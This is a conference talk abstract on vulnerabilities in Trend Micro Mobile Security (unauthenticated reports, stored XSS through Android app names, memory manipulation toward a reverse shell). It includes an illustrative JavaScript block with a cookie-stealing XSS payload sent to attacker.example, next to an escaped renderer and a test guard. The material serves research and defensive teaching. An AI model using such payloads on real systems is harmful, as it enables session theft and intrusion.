Who Scans the Scanner? Exploiting Trend Micro Mobile Security
2025-09-05, Track 2

Trend Micro Mobile Security (TMMS) is a solution widely trusted by enterprises to defend Android devices. But what if the protection becomes the threat? In this talk, I reveal how the very software meant to secure mobile endpoints can be exploited to compromise them. During my research, I identified three vulnerabilities, two confirmed by the vendor.

First, I found that TMMS exposes sensitive security reports online without requiring authentication, revealing device data to anyone. Second, I uncovered a persistent stored XSS sent from Android agents during scans. This payload executes in the browser of anyone who accesses the report, allowing attackers to inject further malicious scripts. Lastly, I'll discuss a memory-level manipulation identified during dynamic analysis of the scan routine, which could lead to code execution. These flaws present a high-impact attack surface individually, and a dangerous chain if combined.

This presentation includes recorded demos and a deep dive into the methodology used to discover these issues. It is tailored for red teamers, offensive security professionals, and researchers focused on mobile and infrastructure security.


This talk is the result of hands-on vulnerability research focused on Trend Micro’s enterprise-grade mobile security solution, TMMS. The project began with a simple question: Can the tools used to protect mobile devices be turned against themselves? That curiosity led to a series of discoveries, two of which Trend Micro acknowledged as confirmed security issues.

The first vulnerability centers on unauthenticated access to TMMS’s device report pages. These pages expose scan histories, app inventories, and device status, all accessible without any form of authentication. This flaw represents a significant breach of confidentiality, offering an attacker valuable insights about an organization’s device fleet and security posture.

Digging deeper, I found that these unauthenticated reports also served as a perfect delivery channel for a stored cross-site scripting attack. By modifying the name of an app on an enrolled Android agent, a value later displayed in the web console, I was able to inject JavaScript directly into the report page. Since this page is rendered without sanitization and without login, the script executes in the browser of any administrator or user who accesses it.
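The sink described above, reduced to its essentials as an added illustration (this is hypothetical code written for this page, not Trend Micro's console code or the speaker's exploit): an app label reported by a device agent is dropped into an HTML report by string concatenation, so a renamed app becomes a stored payload for every visitor. The sample scan, the attacker domain and the function names are all constructed for the example. The hardened renderer applies output encoding to every untrusted value, which is the fix regardless of whether the page is behind authentication.

```javascript
// Constructed sample of what an agent might report after a scan.
// The second app has been renamed on the enrolled device so that its label
// carries an HTML event handler; the label is later displayed in the console.
const sampleScan = {
  deviceId: "device-0001",
  apps: [
    { name: "Calculator", pkg: "com.example.calc", status: "clean" },
    {
      name: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
      pkg: "com.example.renamed",
      status: "clean",
    },
  ],
};

// Vulnerable renderer: untrusted strings are concatenated straight into markup,
// so the browser parses the app label as a tag and runs the onerror handler.
function renderReportVulnerable(scan) {
  let html = `<h1>Scan report for ${scan.deviceId}</h1><ul>`;
  for (const app of scan.apps) {
    html += `<li>${app.name} (${app.pkg}): ${app.status}</li>`;
  }
  return html + "</ul>";
}

// Output encoding for the HTML text context. Every character that can open a
// tag, close an attribute or introduce an entity is replaced by its entity form.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened renderer: identical layout, but no untrusted value reaches the
// markup without going through escapeHtml. The payload is shown as text.
function renderReportSafe(scan) {
  let html = `<h1>Scan report for ${escapeHtml(scan.deviceId)}</h1><ul>`;
  for (const app of scan.apps) {
    html += `<li>${escapeHtml(app.name)} (${escapeHtml(app.pkg)}): ${escapeHtml(app.status)}</li>`;
  }
  return html + "</ul>";
}

// Regression guard for a test suite: any attacker-controlled '<' that survives
// rendering unescaped means the encoding step was skipped somewhere.
function leaksRawMarkup(html, untrustedValues) {
  return untrustedValues.some((v) => /[<>"']/.test(v) && html.includes(v));
}

console.log(renderReportVulnerable(sampleScan));
console.log(renderReportSafe(sampleScan));
```

The guard function is the check to add to the console's own tests: feed it every field that originates on the device (app names, package names, device model strings) and fail the build if any of them appears verbatim in the rendered page.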

The final and most technically complex finding lies within the TMMS Android agent. While inspecting its scan routines via reverse engineering and dynamic testing, I identified a potential path to code execution. Altering function parameters in memory during an antivirus scan may make it possible to invoke unintended behavior, including spawning a reverse shell. Although Trend Micro has not confirmed this issue, preliminary results suggest the feasibility of remote command execution through controlled memory manipulation, especially if initiated from a compromised server or malicious agent.

My talk will take attendees through each phase of the research, from initial reconnaissance and passive analysis to deeper reverse engineering of the Android APK and memory manipulation during runtime. I will demonstrate how these flaws intersect and discuss the viability of chaining them into a full exploit path. The narrative will include recorded demos, such as viewing a report without credentials, triggering XSS via Android scan, and memory patching leading to command execution, to help make the technical impact tangible.

Beyond showcasing vulnerabilities, I’ll reflect on disclosure, vendor response, and the implications for other mobile security products. Attendees will leave with a deeper appreciation for the risks hidden in trusted software, as well as techniques they can apply to analyze similar solutions.

Lucas Carmo is an offensive security researcher and co-founder of Hakai Security, a Brazilian consultancy focused on red teaming and exploit development. With over eight years of experience, he holds OSWE, OSWP, and GMOB certifications and has discovered CVEs in platforms like Trend Micro Mobile Security, Nagios, PRTG, 3CX, and Centreon. He leads Delta7, Hakai’s research division, guiding work on vulnerabilities in all environments. Lucas contributes to open-source projects such as the ReconFTW web UI and shares research through blogs and talks. Outside of hacking, he’s passionate about tattoos and views vulnerability research as a form of digital art.